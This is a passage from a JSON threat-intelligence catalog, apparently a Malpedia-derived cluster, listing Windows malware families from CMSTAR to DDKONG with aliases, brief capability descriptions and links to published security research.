"e4e15ab4-9ba6-444a-b154-2854757e792e", "value": "CMSTAR" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot", "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html" ], "synonyms": [], "type": [] }, "uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217", "value": "CoalaBot" }, { "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", "https://blog.cobaltstrike.com/", "https://www.cobaltstrike.com/support", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", "https://401trg.com/burning-umbrella/ ", "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", "http://cyberforensicator.com/2018/12/23/dissecting-cozy-bears-malicious-lnk-file/" ], "synonyms": [], "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", "value": "Cobalt Strike" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" ], "synonyms": [], "type": [] }, "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", "value": "Cobian RAT" }, { "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://www.group-ib.com/blog/renaissance" ], "synonyms": [ "COOLPANTS" ], "type": [] }, "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", "value": "CobInt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", "https://github.com/hfiref0x/TDL", "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/" ], "synonyms": [ "Carbon" ], "type": [] }, "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", "value": "Cobra Carbon System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", "https://twitter.com/JaromirHorejsi/status/817311664391524352" ], "synonyms": [], "type": [] }, "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", "value": "CockBlocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" ], "synonyms": [], "type": [] }, "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", "value": "CodeKey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" ], "synonyms": [], "type": [] }, "uuid": "9481d7b1-307c-4504-9333-21720b85317b", "value": "Cohhoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/", "https://secrary.com/ReversingMalware/CoinMiner/" ], "synonyms": [], "type": [] }, "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", "value": "Coinminer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", "https://twitter.com/anyrun_app/status/976385355384590337", "https://secrary.com/ReversingMalware/Colony_Bandios/", "https://pastebin.com/GtjBXDmz" ], "synonyms": [ "Bandios", "GrayBird" ], "type": [] }, "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", "value": "Colony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" ], "synonyms": [], "type": [] }, "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", "value": "Combojack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", "value": "Combos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" ], "synonyms": [], "type": [] }, "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", "value": "ComodoSec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research" ], "synonyms": [ "lojack" ], "type": [] }, "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", "value": "Computrace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", "https://twitter.com/struppigel/status/816926371867926528" ], "synonyms": [], "type": [] }, "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", "value": "ComradeCircle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", "value": "concealment_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", "https://www.honeynet.org/files/KYE-Conficker.pdf", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://github.com/tillmannw/cnfckr", "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ "Kido", "downadup", "traffic converter" ], "type": [] }, "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", "value": "Conficker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [], "type": [] }, "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", "value": "Confucius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", "value": "Contopee" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", "value": "CookieBag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" ], "synonyms": [], "type": [] }, "uuid": "495377c4-1be5-4c65-ba66-94c221061415", "value": "Corebot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn", "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html" ], "synonyms": [], "type": [] }, "uuid": "331f0c80-a795-48aa-902e-0b0d57de85f5", "value": "CoreDN" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html", "http://malware.prevenity.com/2014/08/malware-info.html" ], "synonyms": [], "type": [] }, "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", "value": "Coreshell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" ], "synonyms": [], "type": [] }, "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", "value": "CradleCore" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" ], "synonyms": [ "Crash", "Industroyer" ], "type": [] }, "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", "value": "CrashOverride" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "9d193a65-dc18-4832-9daa-aab245cd1c86", "value": "CREAMSICLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", "value": "Credraptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" ], "synonyms": [], "type": [] }, "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", "value": "Crenufs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://s.tencent.com/research/report/669.html", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], "synonyms": [ "SEEDOOR" ], "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", "value": "Crimson RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" ], "synonyms": [], "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", "value": "Crisis (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://hackmag.com/security/ransomware-russian-style/", "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", "https://twitter.com/demonslay335/status/971164798376468481" ], "synonyms": [], "type": [] }, "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", "value": "Cryakl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" ], "synonyms": [], "type": [] }, "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", "value": "CryLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] }, "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", "value": "CrypMic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" ], "synonyms": [], "type": [] }, "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", "value": "Crypt0l0cker" }, { "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.secureworks.com/research/cryptolocker-ransomware" ], "synonyms": [], "type": [] }, "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", "value": "CryptoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" ], "synonyms": [], "type": [] }, "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", "value": "CryptoLuck" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/" ], "synonyms": [ "CryptFile2" ], "type": [] }, "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", "value": "CryptoMix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", "https://twitter.com/struppigel/status/810770490491043840" ], "synonyms": [], "type": [] }, "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", "value": "Cryptorium" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", "value": "CryptoShield" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" ], "synonyms": [], "type": [] }, "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", "value": "CryptoShuffler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" ], "synonyms": [], "type": [] }, "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", "value": "Cryptowall" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" ], "synonyms": [], "type": [] }, "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", "value": "CryptoWire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" ], "synonyms": [], "type": [] }, "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", "value": "CryptoFortress" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", "https://twitter.com/JaromirHorejsi/status/818369717371027456" ], "synonyms": [], "type": [] }, "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", "value": "CryptoRansomeware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] }, "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", "value": "CryptXXXX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", "value": "CsExt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451", "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" ], "synonyms": [ "Windshield?" ], "type": [] }, "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", "value": "Cuegoe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" ], "synonyms": [], "type": [] }, "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", "value": "Cueisfry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" ], "synonyms": [], "type": [] }, "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", "value": "Cutlet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" ], "synonyms": [], "type": [] }, "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", "value": "Cutwail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ "Rebhip" ], "type": [] }, "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", "value": "CyberGate" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" ], "synonyms": [], "type": [] }, "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", "value": "CyberSplitter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" ], "synonyms": [], "type": [] }, "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", "value": "CycBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", "value": "Dairy" }, { "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/" ], "synonyms": [], "type": [] }, "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", "value": "DanaBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", "https://darkcomet.net", "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ "Fynloski", "klovbot" ], "type": [] }, "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", "value": "DarkComet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html", "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html" ], "synonyms": [], "type": [] }, "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", "value": "DarkMegi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" ], "synonyms": [ "Chymine" ], "type": [] }, "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", "value": "Darkmoon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", "value": "DarkPulsar" }, { "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" ], "synonyms": [], "type": [] }, "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", "value": "DarkShell" }, { "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", "http://telegra.ph/Analiz-botneta-DarkSky-12-30", "https://blog.radware.com/security/2018/02/darksky-botnet/", "https://github.com/ims0rry/DarkSky-botnet" ], "synonyms": [], "type": [] }, "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", "value": "Darksky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" ], "synonyms": [], "type": [] }, "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", "value": "DarkStRat" }, { "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", "https://securelist.com/dark-tequila-anejo/87528/" ], "synonyms": [], "type": [] }, "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", "value": "DarkTequila" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" ], "synonyms": [], "type": [] }, "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", "value": "Darktrack RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/" ], "synonyms": [ "Muirim", "Nioupale" ], "type": [] }, "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", "value": "Daserf" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" ], "synonyms": [], "type": [] }, "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", "value": "Datper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", "value": "DDKONG" }, { "description": "", 